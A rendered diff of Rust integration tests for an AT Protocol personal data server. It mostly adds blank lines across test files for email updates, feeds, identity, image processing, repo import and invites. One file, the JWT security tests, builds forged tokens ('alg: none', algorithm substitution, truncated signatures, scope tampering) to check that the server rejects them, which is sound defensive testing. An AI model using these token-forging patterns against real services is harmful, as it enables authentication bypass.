let client = client();
···
371
380
.expect("Failed to send request");
372
381
assert_eq!(res3.status(), StatusCode::UNPROCESSABLE_ENTITY);
373
382
}
383
+
374
384
#[tokio::test]
375
385
async fn test_delete_account_nonexistent_user() {
376
386
let client = client();
+14
tests/email_update.rs
+14
tests/email_update.rs
···
2
2
use reqwest::StatusCode;
3
3
use serde_json::{json, Value};
4
4
use sqlx::PgPool;
5
+
5
6
async fn get_pool() -> PgPool {
6
7
let conn_str = common::get_db_connection_string().await;
7
8
sqlx::postgres::PgPoolOptions::new()
···
10
11
.await
11
12
.expect("Failed to connect to test database")
12
13
}
14
+
13
15
async fn create_verified_account(client: &reqwest::Client, base_url: &str, handle: &str, email: &str) -> String {
14
16
let res = client
15
17
.post(format!("{}/xrpc/com.atproto.server.createAccount", base_url))
···
26
28
let did = body["did"].as_str().expect("No did");
27
29
common::verify_new_account(client, did).await
28
30
}
31
+
29
32
#[tokio::test]
30
33
async fn test_email_update_flow_success() {
31
34
let client = common::client();
···
77
80
assert!(user.email_pending_verification.is_none());
78
81
assert!(user.email_confirmation_code.is_none());
79
82
}
83
+
80
84
#[tokio::test]
81
85
async fn test_request_email_update_taken_email() {
82
86
let client = common::client();
···
98
102
let body: Value = res.json().await.expect("Invalid JSON");
99
103
assert_eq!(body["error"], "EmailTaken");
100
104
}
105
+
101
106
#[tokio::test]
102
107
async fn test_confirm_email_invalid_token() {
103
108
let client = common::client();
···
128
133
let body: Value = res.json().await.expect("Invalid JSON");
129
134
assert_eq!(body["error"], "InvalidToken");
130
135
}
136
+
131
137
#[tokio::test]
132
138
async fn test_confirm_email_wrong_email() {
133
139
let client = common::client();
···
164
170
let body: Value = res.json().await.expect("Invalid JSON");
165
171
assert_eq!(body["message"], "Email does not match pending update");
166
172
}
173
+
167
174
#[tokio::test]
168
175
async fn test_update_email_success_no_token_required() {
169
176
let client = common::client();
···
187
194
.expect("User not found");
188
195
assert_eq!(user.email, Some(new_email));
189
196
}
197
+
190
198
#[tokio::test]
191
199
async fn test_update_email_same_email_noop() {
192
200
let client = common::client();
···
203
211
.expect("Failed to update email");
204
212
assert_eq!(res.status(), StatusCode::OK, "Updating to same email should succeed as no-op");
205
213
}
214
+
206
215
#[tokio::test]
207
216
async fn test_update_email_requires_token_after_pending() {
208
217
let client = common::client();
···
230
239
let body: Value = res.json().await.expect("Invalid JSON");
231
240
assert_eq!(body["error"], "TokenRequired");
232
241
}
242
+
233
243
#[tokio::test]
234
244
async fn test_update_email_with_valid_token() {
235
245
let client = common::client();
···
273
283
assert_eq!(user.email, Some(new_email));
274
284
assert!(user.email_pending_verification.is_none());
275
285
}
286
+
276
287
#[tokio::test]
277
288
async fn test_update_email_invalid_token() {
278
289
let client = common::client();
···
303
314
let body: Value = res.json().await.expect("Invalid JSON");
304
315
assert_eq!(body["error"], "InvalidToken");
305
316
}
317
+
306
318
#[tokio::test]
307
319
async fn test_update_email_already_taken() {
308
320
let client = common::client();
···
324
336
let body: Value = res.json().await.expect("Invalid JSON");
325
337
assert!(body["message"].as_str().unwrap().contains("already in use") || body["error"] == "InvalidRequest");
326
338
}
339
+
327
340
#[tokio::test]
328
341
async fn test_update_email_no_auth() {
329
342
let client = common::client();
···
338
351
let body: Value = res.json().await.expect("Invalid JSON");
339
352
assert_eq!(body["error"], "AuthenticationRequired");
340
353
}
354
+
341
355
#[tokio::test]
342
356
async fn test_update_email_invalid_format() {
343
357
let client = common::client();
+7
tests/feed.rs
+7
tests/feed.rs
···
1
1
mod common;
2
2
use common::{base_url, client, create_account_and_login};
3
3
use serde_json::json;
4
+
4
5
#[tokio::test]
5
6
async fn test_get_timeline_requires_auth() {
6
7
let client = client();
···
12
13
.unwrap();
13
14
assert_eq!(res.status(), 401);
14
15
}
16
+
15
17
#[tokio::test]
16
18
async fn test_get_author_feed_requires_actor() {
17
19
let client = client();
···
25
27
.unwrap();
26
28
assert_eq!(res.status(), 400);
27
29
}
30
+
28
31
#[tokio::test]
29
32
async fn test_get_actor_likes_requires_actor() {
30
33
let client = client();
···
38
41
.unwrap();
39
42
assert_eq!(res.status(), 400);
40
43
}
44
+
41
45
#[tokio::test]
42
46
async fn test_get_post_thread_requires_uri() {
43
47
let client = client();
···
51
55
.unwrap();
52
56
assert_eq!(res.status(), 400);
53
57
}
58
+
54
59
#[tokio::test]
55
60
async fn test_get_feed_requires_auth() {
56
61
let client = client();
···
65
70
.unwrap();
66
71
assert_eq!(res.status(), 401);
67
72
}
73
+
68
74
#[tokio::test]
69
75
async fn test_get_feed_requires_feed_param() {
70
76
let client = client();
···
78
84
.unwrap();
79
85
assert_eq!(res.status(), 400);
80
86
}
87
+
81
88
#[tokio::test]
82
89
async fn test_register_push_requires_auth() {
83
90
let client = client();
+6
tests/firehose.rs
+6
tests/firehose.rs
···
8
8
use serde_json::{json, Value};
9
9
use std::io::Cursor;
10
10
use tokio_tungstenite::{connect_async, tungstenite};
11
+
11
12
#[derive(Debug, Deserialize)]
12
13
struct FrameHeader {
13
14
op: i64,
14
15
t: String,
15
16
}
17
+
16
18
#[derive(Debug, Deserialize)]
17
19
struct CommitFrame {
18
20
seq: i64,
···
29
31
blobs: Vec<Cid>,
30
32
time: String,
31
33
}
34
+
32
35
#[derive(Debug, Deserialize)]
33
36
struct RepoOp {
34
37
action: String,
35
38
path: String,
36
39
cid: Option<Cid>,
37
40
}
41
+
38
42
fn find_cbor_map_end(bytes: &[u8]) -> Result<usize, String> {
39
43
let mut pos = 0;
40
44
fn read_uint(bytes: &[u8], pos: &mut usize, additional: u8) -> Result<u64, String> {
···
104
108
skip_value(bytes, &mut pos)?;
105
109
Ok(pos)
106
110
}
111
+
107
112
fn parse_frame(bytes: &[u8]) -> Result<(FrameHeader, CommitFrame), String> {
108
113
let header_len = find_cbor_map_end(bytes)?;
109
114
let header: FrameHeader = serde_ipld_dagcbor::from_slice(&bytes[..header_len])
···
113
118
.map_err(|e| format!("Failed to parse commit frame: {:?}", e))?;
114
119
Ok((header, frame))
115
120
}
121
+
116
122
#[tokio::test]
117
123
async fn test_firehose_subscription() {
118
124
let client = client();
+1
-1
tests/firehose_validation.rs
+1
-1
tests/firehose_validation.rs
+6
tests/helpers/mod.rs
+6
tests/helpers/mod.rs
···
1
1
use chrono::Utc;
2
2
use reqwest::StatusCode;
3
3
use serde_json::{Value, json};
4
+
4
5
pub use crate::common::*;
6
+
5
7
#[allow(dead_code)]
6
8
pub async fn setup_new_user(handle_prefix: &str) -> (String, String) {
7
9
let client = client();
···
40
42
let new_jwt = verify_new_account(&client, &new_did).await;
41
43
(new_did, new_jwt)
42
44
}
45
+
43
46
#[allow(dead_code)]
44
47
pub async fn create_post(
45
48
client: &reqwest::Client,
···
83
86
let cid = create_body["cid"].as_str().unwrap().to_string();
84
87
(uri, cid)
85
88
}
89
+
86
90
#[allow(dead_code)]
87
91
pub async fn create_follow(
88
92
client: &reqwest::Client,
···
126
130
let cid = create_body["cid"].as_str().unwrap().to_string();
127
131
(uri, cid)
128
132
}
133
+
129
134
#[allow(dead_code)]
130
135
pub async fn create_like(
131
136
client: &reqwest::Client,
···
167
172
body["cid"].as_str().unwrap().to_string(),
168
173
)
169
174
}
175
+
170
176
#[allow(dead_code)]
171
177
pub async fn create_repost(
172
178
client: &reqwest::Client,
+9
tests/identity.rs
+9
tests/identity.rs
···
4
4
use serde_json::{Value, json};
5
5
use wiremock::matchers::{method, path};
6
6
use wiremock::{Mock, MockServer, ResponseTemplate};
7
+
7
8
#[tokio::test]
8
9
async fn test_resolve_handle_success() {
9
10
let client = client();
···
39
40
let body: Value = res.json().await.expect("Response was not valid JSON");
40
41
assert_eq!(body["did"], did);
41
42
}
43
+
42
44
#[tokio::test]
43
45
async fn test_resolve_handle_not_found() {
44
46
let client = client();
···
56
58
let body: Value = res.json().await.expect("Response was not valid JSON");
57
59
assert_eq!(body["error"], "HandleNotFound");
58
60
}
61
+
59
62
#[tokio::test]
60
63
async fn test_resolve_handle_missing_param() {
61
64
let client = client();
···
69
72
.expect("Failed to send request");
70
73
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
71
74
}
75
+
72
76
#[tokio::test]
73
77
async fn test_well_known_did() {
74
78
let client = client();
···
82
86
assert!(body["id"].as_str().unwrap().starts_with("did:web:"));
83
87
assert_eq!(body["service"][0]["type"], "AtprotoPersonalDataServer");
84
88
}
89
+
85
90
#[tokio::test]
86
91
async fn test_create_did_web_account_and_resolve() {
87
92
let client = client();
···
145
150
assert_eq!(doc["verificationMethod"][0]["controller"], did);
146
151
assert!(doc["verificationMethod"][0]["publicKeyJwk"].is_object());
147
152
}
153
+
148
154
#[tokio::test]
149
155
async fn test_create_account_duplicate_handle() {
150
156
let client = client();
···
178
184
let body: Value = res.json().await.expect("Response was not JSON");
179
185
assert_eq!(body["error"], "HandleTaken");
180
186
}
187
+
181
188
#[tokio::test]
182
189
async fn test_did_web_lifecycle() {
183
190
let client = client();
···
267
274
assert_eq!(record_body["value"]["displayName"], "DID Web User");
268
275
*/
269
276
}
277
+
270
278
#[tokio::test]
271
279
async fn test_get_recommended_did_credentials_success() {
272
280
let client = client();
···
296
304
assert_eq!(body["services"]["atprotoPds"]["type"], "AtprotoPersonalDataServer");
297
305
assert!(body["services"]["atprotoPds"]["endpoint"].is_string());
298
306
}
307
+
299
308
#[tokio::test]
300
309
async fn test_get_recommended_did_credentials_no_auth() {
301
310
let client = client();
+31
tests/image_processing.rs
+31
tests/image_processing.rs
···
1
1
use bspds::image::{ImageProcessor, ImageError, OutputFormat, THUMB_SIZE_FEED, THUMB_SIZE_FULL, DEFAULT_MAX_FILE_SIZE};
2
2
use image::{DynamicImage, ImageFormat};
3
3
use std::io::Cursor;
4
+
4
5
fn create_test_png(width: u32, height: u32) -> Vec<u8> {
5
6
let img = DynamicImage::new_rgb8(width, height);
6
7
let mut buf = Vec::new();
7
8
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png).unwrap();
8
9
buf
9
10
}
11
+
10
12
fn create_test_jpeg(width: u32, height: u32) -> Vec<u8> {
11
13
let img = DynamicImage::new_rgb8(width, height);
12
14
let mut buf = Vec::new();
13
15
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Jpeg).unwrap();
14
16
buf
15
17
}
18
+
16
19
fn create_test_gif(width: u32, height: u32) -> Vec<u8> {
17
20
let img = DynamicImage::new_rgb8(width, height);
18
21
let mut buf = Vec::new();
19
22
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Gif).unwrap();
20
23
buf
21
24
}
25
+
22
26
fn create_test_webp(width: u32, height: u32) -> Vec<u8> {
23
27
let img = DynamicImage::new_rgb8(width, height);
24
28
let mut buf = Vec::new();
25
29
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::WebP).unwrap();
26
30
buf
27
31
}
32
+
28
33
#[test]
29
34
fn test_process_png() {
30
35
let processor = ImageProcessor::new();
···
33
38
assert_eq!(result.original.width, 500);
34
39
assert_eq!(result.original.height, 500);
35
40
}
41
+
36
42
#[test]
37
43
fn test_process_jpeg() {
38
44
let processor = ImageProcessor::new();
···
41
47
assert_eq!(result.original.width, 400);
42
48
assert_eq!(result.original.height, 300);
43
49
}
50
+
44
51
#[test]
45
52
fn test_process_gif() {
46
53
let processor = ImageProcessor::new();
···
49
56
assert_eq!(result.original.width, 200);
50
57
assert_eq!(result.original.height, 200);
51
58
}
59
+
52
60
#[test]
53
61
fn test_process_webp() {
54
62
let processor = ImageProcessor::new();
···
57
65
assert_eq!(result.original.width, 300);
58
66
assert_eq!(result.original.height, 200);
59
67
}
68
+
60
69
#[test]
61
70
fn test_thumbnail_feed_size() {
62
71
let processor = ImageProcessor::new();
···
66
75
assert!(thumb.width <= THUMB_SIZE_FEED);
67
76
assert!(thumb.height <= THUMB_SIZE_FEED);
68
77
}
78
+
69
79
#[test]
70
80
fn test_thumbnail_full_size() {
71
81
let processor = ImageProcessor::new();
···
75
85
assert!(thumb.width <= THUMB_SIZE_FULL);
76
86
assert!(thumb.height <= THUMB_SIZE_FULL);
77
87
}
88
+
78
89
#[test]
79
90
fn test_no_thumbnail_small_image() {
80
91
let processor = ImageProcessor::new();
···
83
94
assert!(result.thumbnail_feed.is_none(), "Small image should not get feed thumbnail");
84
95
assert!(result.thumbnail_full.is_none(), "Small image should not get full thumbnail");
85
96
}
97
+
86
98
#[test]
87
99
fn test_webp_conversion() {
88
100
let processor = ImageProcessor::new().with_output_format(OutputFormat::WebP);
···
90
102
let result = processor.process(&data, "image/png").unwrap();
91
103
assert_eq!(result.original.mime_type, "image/webp");
92
104
}
105
+
93
106
#[test]
94
107
fn test_jpeg_output_format() {
95
108
let processor = ImageProcessor::new().with_output_format(OutputFormat::Jpeg);
···
97
110
let result = processor.process(&data, "image/png").unwrap();
98
111
assert_eq!(result.original.mime_type, "image/jpeg");
99
112
}
113
+
100
114
#[test]
101
115
fn test_png_output_format() {
102
116
let processor = ImageProcessor::new().with_output_format(OutputFormat::Png);
···
104
118
let result = processor.process(&data, "image/jpeg").unwrap();
105
119
assert_eq!(result.original.mime_type, "image/png");
106
120
}
121
+
107
122
#[test]
108
123
fn test_max_dimension_enforced() {
109
124
let processor = ImageProcessor::new().with_max_dimension(1000);
···
116
131
assert_eq!(max_dimension, 1000);
117
132
}
118
133
}
134
+
119
135
#[test]
120
136
fn test_file_size_limit() {
121
137
let processor = ImageProcessor::new().with_max_file_size(100);
···
127
143
assert_eq!(max_size, 100);
128
144
}
129
145
}
146
+
130
147
#[test]
131
148
fn test_default_max_file_size() {
132
149
assert_eq!(DEFAULT_MAX_FILE_SIZE, 10 * 1024 * 1024);
133
150
}
151
+
134
152
#[test]
135
153
fn test_unsupported_format_rejected() {
136
154
let processor = ImageProcessor::new();
···
138
156
let result = processor.process(data, "application/octet-stream");
139
157
assert!(matches!(result, Err(ImageError::UnsupportedFormat(_))));
140
158
}
159
+
141
160
#[test]
142
161
fn test_corrupted_image_handling() {
143
162
let processor = ImageProcessor::new();
···
145
164
let result = processor.process(data, "image/png");
146
165
assert!(matches!(result, Err(ImageError::DecodeError(_))));
147
166
}
167
+
148
168
#[test]
149
169
fn test_aspect_ratio_preserved_landscape() {
150
170
let processor = ImageProcessor::new();
···
155
175
let thumb_ratio = thumb.width as f64 / thumb.height as f64;
156
176
assert!((original_ratio - thumb_ratio).abs() < 0.1, "Aspect ratio should be preserved");
157
177
}
178
+
158
179
#[test]
159
180
fn test_aspect_ratio_preserved_portrait() {
160
181
let processor = ImageProcessor::new();
···
165
186
let thumb_ratio = thumb.width as f64 / thumb.height as f64;
166
187
assert!((original_ratio - thumb_ratio).abs() < 0.1, "Aspect ratio should be preserved");
167
188
}
189
+
168
190
#[test]
169
191
fn test_mime_type_detection_auto() {
170
192
let processor = ImageProcessor::new();
···
172
194
let result = processor.process(&data, "application/octet-stream");
173
195
assert!(result.is_ok(), "Should detect PNG format from data");
174
196
}
197
+
175
198
#[test]
176
199
fn test_is_supported_mime_type() {
177
200
assert!(ImageProcessor::is_supported_mime_type("image/jpeg"));
···
186
209
assert!(!ImageProcessor::is_supported_mime_type("text/plain"));
187
210
assert!(!ImageProcessor::is_supported_mime_type("application/json"));
188
211
}
212
+
189
213
#[test]
190
214
fn test_strip_exif() {
191
215
let data = create_test_jpeg(100, 100);
···
194
218
let stripped = result.unwrap();
195
219
assert!(!stripped.is_empty());
196
220
}
221
+
197
222
#[test]
198
223
fn test_with_thumbnails_disabled() {
199
224
let processor = ImageProcessor::new().with_thumbnails(false);
···
202
227
assert!(result.thumbnail_feed.is_none(), "Thumbnails should be disabled");
203
228
assert!(result.thumbnail_full.is_none(), "Thumbnails should be disabled");
204
229
}
230
+
205
231
#[test]
206
232
fn test_builder_chaining() {
207
233
let processor = ImageProcessor::new()
···
213
239
let result = processor.process(&data, "image/png").unwrap();
214
240
assert_eq!(result.original.mime_type, "image/jpeg");
215
241
}
242
+
216
243
#[test]
217
244
fn test_processed_image_fields() {
218
245
let processor = ImageProcessor::new();
···
223
250
assert!(result.original.width > 0);
224
251
assert!(result.original.height > 0);
225
252
}
253
+
226
254
#[test]
227
255
fn test_only_feed_thumbnail_for_medium_images() {
228
256
let processor = ImageProcessor::new();
···
231
259
assert!(result.thumbnail_feed.is_some(), "Should have feed thumbnail");
232
260
assert!(result.thumbnail_full.is_none(), "Should NOT have full thumbnail for 500px image");
233
261
}
262
+
234
263
#[test]
235
264
fn test_both_thumbnails_for_large_images() {
236
265
let processor = ImageProcessor::new();
···
239
268
assert!(result.thumbnail_feed.is_some(), "Should have feed thumbnail");
240
269
assert!(result.thumbnail_full.is_some(), "Should have full thumbnail for 2000px image");
241
270
}
271
+
242
272
#[test]
243
273
fn test_exact_threshold_boundary_feed() {
244
274
let processor = ImageProcessor::new();
···
249
279
let result = processor.process(&above_threshold, "image/png").unwrap();
250
280
assert!(result.thumbnail_feed.is_some(), "Above threshold should generate thumbnail");
251
281
}
282
+
252
283
#[test]
253
284
fn test_exact_threshold_boundary_full() {
254
285
let processor = ImageProcessor::new();
+11
tests/import_verification.rs
+11
tests/import_verification.rs
···
3
3
use iroh_car::CarHeader;
4
4
use reqwest::StatusCode;
5
5
use serde_json::json;
6
+
6
7
#[tokio::test]
7
8
async fn test_import_repo_requires_auth() {
8
9
let client = client();
···
15
16
.expect("Request failed");
16
17
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
17
18
}
19
+
18
20
#[tokio::test]
19
21
async fn test_import_repo_invalid_car() {
20
22
let client = client();
···
31
33
let body: serde_json::Value = res.json().await.unwrap();
32
34
assert_eq!(body["error"], "InvalidRequest");
33
35
}
36
+
34
37
#[tokio::test]
35
38
async fn test_import_repo_empty_body() {
36
39
let client = client();
···
45
48
.expect("Request failed");
46
49
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
47
50
}
51
+
48
52
fn write_varint(buf: &mut Vec<u8>, mut value: u64) {
49
53
loop {
50
54
let mut byte = (value & 0x7F) as u8;
···
58
62
}
59
63
}
60
64
}
65
+
61
66
#[tokio::test]
62
67
async fn test_import_rejects_car_for_different_user() {
63
68
let client = client();
···
90
95
body
91
96
);
92
97
}
98
+
93
99
#[tokio::test]
94
100
async fn test_import_accepts_own_exported_repo() {
95
101
let client = client();
···
135
141
.expect("Failed to import repo");
136
142
assert_eq!(import_res.status(), StatusCode::OK);
137
143
}
144
+
138
145
#[tokio::test]
139
146
async fn test_import_repo_size_limit() {
140
147
let client = client();
···
165
172
}
166
173
}
167
174
}
175
+
168
176
#[tokio::test]
169
177
async fn test_import_deactivated_account_rejected() {
170
178
let client = client();
···
205
213
import_res.status()
206
214
);
207
215
}
216
+
208
217
#[tokio::test]
209
218
async fn test_import_invalid_car_structure() {
210
219
let client = client();
···
220
229
.expect("Request failed");
221
230
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
222
231
}
232
+
223
233
#[tokio::test]
224
234
async fn test_import_car_with_no_roots() {
225
235
let client = client();
···
241
251
let body: serde_json::Value = res.json().await.unwrap();
242
252
assert_eq!(body["error"], "InvalidRequest");
243
253
}
254
+
244
255
#[tokio::test]
245
256
async fn test_import_preserves_records_after_reimport() {
246
257
let client = client();
+8
tests/import_with_verification.rs
+8
tests/import_with_verification.rs
···
11
11
use std::collections::BTreeMap;
12
12
use wiremock::matchers::{method, path};
13
13
use wiremock::{Mock, MockServer, ResponseTemplate};
14
+
14
15
fn make_cid(data: &[u8]) -> Cid {
15
16
let mut hasher = Sha256::new();
16
17
hasher.update(data);
···
18
19
let multihash = multihash::Multihash::wrap(0x12, &hash).unwrap();
19
20
Cid::new_v1(0x71, multihash)
20
21
}
22
+
21
23
fn write_varint(buf: &mut Vec<u8>, mut value: u64) {
22
24
loop {
23
25
let mut byte = (value & 0x7F) as u8;
···
31
33
}
32
34
}
33
35
}
36
+
34
37
fn encode_car_block(cid: &Cid, data: &[u8]) -> Vec<u8> {
35
38
let cid_bytes = cid.to_bytes();
36
39
let mut result = Vec::new();
···
39
42
result.extend_from_slice(data);
40
43
result
41
44
}
45
+
42
46
fn get_multikey_from_signing_key(signing_key: &SigningKey) -> String {
43
47
let public_key = signing_key.verifying_key();
44
48
let compressed = public_key.to_sec1_bytes();
···
55
59
buf.extend_from_slice(&compressed);
56
60
multibase::encode(multibase::Base::Base58Btc, buf)
57
61
}
62
+
58
63
fn create_did_document(did: &str, handle: &str, signing_key: &SigningKey, pds_endpoint: &str) -> serde_json::Value {
59
64
let multikey = get_multikey_from_signing_key(signing_key);
60
65
json!({
···
77
82
}]
78
83
})
79
84
}
85
+
80
86
fn create_signed_commit(
81
87
did: &str,
82
88
data_cid: &Cid,
···
106
112
let cid = make_cid(&signed_bytes);
107
113
(signed_bytes, cid)
108
114
}
115
+
109
116
fn create_mst_node(entries: Vec<(String, Cid)>) -> (Vec<u8>, Cid) {
110
117
let ipld_entries: Vec<Ipld> = entries
111
118
.into_iter()
···
124
131
let cid = make_cid(&bytes);
125
132
(bytes, cid)
126
133
}
134
+
127
135
fn create_record() -> (Vec<u8>, Cid) {
128
136
let record = Ipld::Map(BTreeMap::from([
129
137
("$type".to_string(), Ipld::String("app.bsky.feed.post".to_string())),
+10
tests/invite.rs
+10
tests/invite.rs
···
2
2
use common::*;
3
3
use reqwest::StatusCode;
4
4
use serde_json::{Value, json};
5
+
5
6
#[tokio::test]
6
7
async fn test_create_invite_code_success() {
7
8
let client = client();
···
26
27
assert!(!code.is_empty());
27
28
assert!(code.contains('-'), "Code should be a UUID format");
28
29
}
30
+
29
31
#[tokio::test]
30
32
async fn test_create_invite_code_no_auth() {
31
33
let client = client();
···
45
47
let body: Value = res.json().await.expect("Response was not valid JSON");
46
48
assert_eq!(body["error"], "AuthenticationRequired");
47
49
}
50
+
48
51
#[tokio::test]
49
52
async fn test_create_invite_code_invalid_use_count() {
50
53
let client = client();
···
66
69
let body: Value = res.json().await.expect("Response was not valid JSON");
67
70
assert_eq!(body["error"], "InvalidRequest");
68
71
}
72
+
69
73
#[tokio::test]
70
74
async fn test_create_invite_code_for_another_account() {
71
75
let client = client();
···
89
93
let body: Value = res.json().await.expect("Response was not valid JSON");
90
94
assert!(body["code"].is_string());
91
95
}
96
+
92
97
#[tokio::test]
93
98
async fn test_create_invite_codes_success() {
94
99
let client = client();
···
114
119
assert_eq!(codes.len(), 1);
115
120
assert_eq!(codes[0]["codes"].as_array().unwrap().len(), 3);
116
121
}
122
+
117
123
#[tokio::test]
118
124
async fn test_create_invite_codes_for_multiple_accounts() {
119
125
let client = client();
···
143
149
assert_eq!(code_obj["codes"].as_array().unwrap().len(), 2);
144
150
}
145
151
}
152
+
146
153
#[tokio::test]
147
154
async fn test_create_invite_codes_no_auth() {
148
155
let client = client();
···
160
167
.expect("Failed to send request");
161
168
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
162
169
}
170
+
163
171
#[tokio::test]
164
172
async fn test_get_account_invite_codes_success() {
165
173
let client = client();
···
198
206
assert!(code["createdAt"].is_string());
199
207
assert!(code["uses"].is_array());
200
208
}
209
+
201
210
#[tokio::test]
202
211
async fn test_get_account_invite_codes_no_auth() {
203
212
let client = client();
···
211
220
.expect("Failed to send request");
212
221
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
213
222
}
223
+
214
224
#[tokio::test]
215
225
async fn test_get_account_invite_codes_include_used_filter() {
216
226
let client = client();
+43
tests/jwt_security.rs
+43
tests/jwt_security.rs
···
15
15
use reqwest::StatusCode;
16
16
use serde_json::{json, Value};
17
17
use sha2::{Digest, Sha256};
18
+
18
19
fn generate_user_key() -> Vec<u8> {
19
20
let secret_key = SecretKey::random(&mut OsRng);
20
21
secret_key.to_bytes().to_vec()
21
22
}
23
+
22
24
fn create_custom_jwt(header: &Value, claims: &Value, key_bytes: &[u8]) -> String {
23
25
let signing_key = SigningKey::from_slice(key_bytes).expect("valid key");
24
26
let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(header).unwrap());
···
28
30
let signature_b64 = URL_SAFE_NO_PAD.encode(signature.to_bytes());
29
31
format!("{}.{}", message, signature_b64)
30
32
}
33
+
31
34
fn create_unsigned_jwt(header: &Value, claims: &Value) -> String {
32
35
let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(header).unwrap());
33
36
let claims_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(claims).unwrap());
34
37
format!("{}.{}.", header_b64, claims_b64)
35
38
}
39
+
36
40
#[test]
37
41
fn test_jwt_security_forged_signature_rejected() {
38
42
let key_bytes = generate_user_key();
···
46
50
let err_msg = result.err().unwrap().to_string();
47
51
assert!(err_msg.contains("signature") || err_msg.contains("Signature"), "Error should mention signature: {}", err_msg);
48
52
}
53
+
49
54
#[test]
50
55
fn test_jwt_security_modified_payload_rejected() {
51
56
let key_bytes = generate_user_key();
···
60
65
let result = verify_access_token(&modified_token, &key_bytes);
61
66
assert!(result.is_err(), "Modified payload must be rejected");
62
67
}
68
+
63
69
#[test]
64
70
fn test_jwt_security_algorithm_none_attack_rejected() {
65
71
let key_bytes = generate_user_key();
···
81
87
let result = verify_access_token(&malicious_token, &key_bytes);
82
88
assert!(result.is_err(), "Algorithm 'none' attack must be rejected");
83
89
}
90
+
84
91
#[test]
85
92
fn test_jwt_security_algorithm_substitution_hs256_rejected() {
86
93
let key_bytes = generate_user_key();
···
111
118
let result = verify_access_token(&malicious_token, &key_bytes);
112
119
assert!(result.is_err(), "HS256 algorithm substitution must be rejected");
113
120
}
121
+
114
122
#[test]
115
123
fn test_jwt_security_algorithm_substitution_rs256_rejected() {
116
124
let key_bytes = generate_user_key();
···
135
143
let result = verify_access_token(&malicious_token, &key_bytes);
136
144
assert!(result.is_err(), "RS256 algorithm substitution must be rejected");
137
145
}
146
+
138
147
#[test]
139
148
fn test_jwt_security_algorithm_substitution_es256_rejected() {
140
149
let key_bytes = generate_user_key();
···
159
168
let result = verify_access_token(&malicious_token, &key_bytes);
160
169
assert!(result.is_err(), "ES256 (P-256) algorithm substitution must be rejected (we use ES256K/secp256k1)");
161
170
}
171
+
162
172
#[test]
163
173
fn test_jwt_security_token_type_confusion_refresh_as_access() {
164
174
let key_bytes = generate_user_key();
···
169
179
let err_msg = result.err().unwrap().to_string();
170
180
assert!(err_msg.contains("Invalid token type"), "Error: {}", err_msg);
171
181
}
182
+
172
183
#[test]
173
184
fn test_jwt_security_token_type_confusion_access_as_refresh() {
174
185
let key_bytes = generate_user_key();
···
179
190
let err_msg = result.err().unwrap().to_string();
180
191
assert!(err_msg.contains("Invalid token type"), "Error: {}", err_msg);
181
192
}
193
+
182
194
#[test]
183
195
fn test_jwt_security_token_type_confusion_service_as_access() {
184
196
let key_bytes = generate_user_key();
···
188
200
let result = verify_access_token(&service_token, &key_bytes);
189
201
assert!(result.is_err(), "Service token must not be accepted as access token");
190
202
}
203
+
191
204
#[test]
192
205
fn test_jwt_security_scope_manipulation_attack() {
193
206
let key_bytes = generate_user_key();
···
211
224
let err_msg = result.err().unwrap().to_string();
212
225
assert!(err_msg.contains("Invalid token scope"), "Error: {}", err_msg);
213
226
}
227
+
214
228
#[test]
215
229
fn test_jwt_security_empty_scope_rejected() {
216
230
let key_bytes = generate_user_key();
···
232
246
let result = verify_access_token(&token, &key_bytes);
233
247
assert!(result.is_err(), "Empty scope must be rejected for access tokens");
234
248
}
249
+
235
250
#[test]
236
251
fn test_jwt_security_missing_scope_rejected() {
237
252
let key_bytes = generate_user_key();
···
252
267
let result = verify_access_token(&token, &key_bytes);
253
268
assert!(result.is_err(), "Missing scope must be rejected for access tokens");
254
269
}
270
+
255
271
#[test]
256
272
fn test_jwt_security_expired_token_rejected() {
257
273
let key_bytes = generate_user_key();
···
275
291
let err_msg = result.err().unwrap().to_string();
276
292
assert!(err_msg.contains("expired"), "Error: {}", err_msg);
277
293
}
294
+
278
295
#[test]
279
296
fn test_jwt_security_future_iat_accepted() {
280
297
let key_bytes = generate_user_key();
···
296
313
let result = verify_access_token(&token, &key_bytes);
297
314
assert!(result.is_ok(), "Slight future iat should be accepted for clock skew tolerance");
298
315
}
316
+
299
317
#[test]
300
318
fn test_jwt_security_cross_user_key_attack() {
301
319
let key_bytes_user1 = generate_user_key();
···
305
323
let result = verify_access_token(&token, &key_bytes_user2);
306
324
assert!(result.is_err(), "Token signed by user1's key must not verify with user2's key");
307
325
}
326
+
308
327
#[test]
309
328
fn test_jwt_security_signature_truncation_rejected() {
310
329
let key_bytes = generate_user_key();
···
317
336
let result = verify_access_token(&truncated_token, &key_bytes);
318
337
assert!(result.is_err(), "Truncated signature must be rejected");
319
338
}
339
+
320
340
#[test]
321
341
fn test_jwt_security_signature_extension_rejected() {
322
342
let key_bytes = generate_user_key();
···
330
350
let result = verify_access_token(&extended_token, &key_bytes);
331
351
assert!(result.is_err(), "Extended signature must be rejected");
332
352
}
353
+
333
354
#[test]
334
355
fn test_jwt_security_malformed_tokens_rejected() {
335
356
let key_bytes = generate_user_key();
···
352
373
if token.len() > 40 { &token[..40] } else { token });
353
374
}
354
375
}
376
+
355
377
#[test]
356
378
fn test_jwt_security_missing_required_claims_rejected() {
357
379
let key_bytes = generate_user_key();
···
389
411
assert!(result.is_err(), "Token missing '{}' claim must be rejected", missing_claim);
390
412
}
391
413
}
414
+
392
415
#[test]
393
416
fn test_jwt_security_invalid_header_json_rejected() {
394
417
let key_bytes = generate_user_key();
···
399
422
let result = verify_access_token(&malicious_token, &key_bytes);
400
423
assert!(result.is_err(), "Invalid header JSON must be rejected");
401
424
}
425
+
402
426
#[test]
403
427
fn test_jwt_security_invalid_claims_json_rejected() {
404
428
let key_bytes = generate_user_key();
···
409
433
let result = verify_access_token(&malicious_token, &key_bytes);
410
434
assert!(result.is_err(), "Invalid claims JSON must be rejected");
411
435
}
436
+
412
437
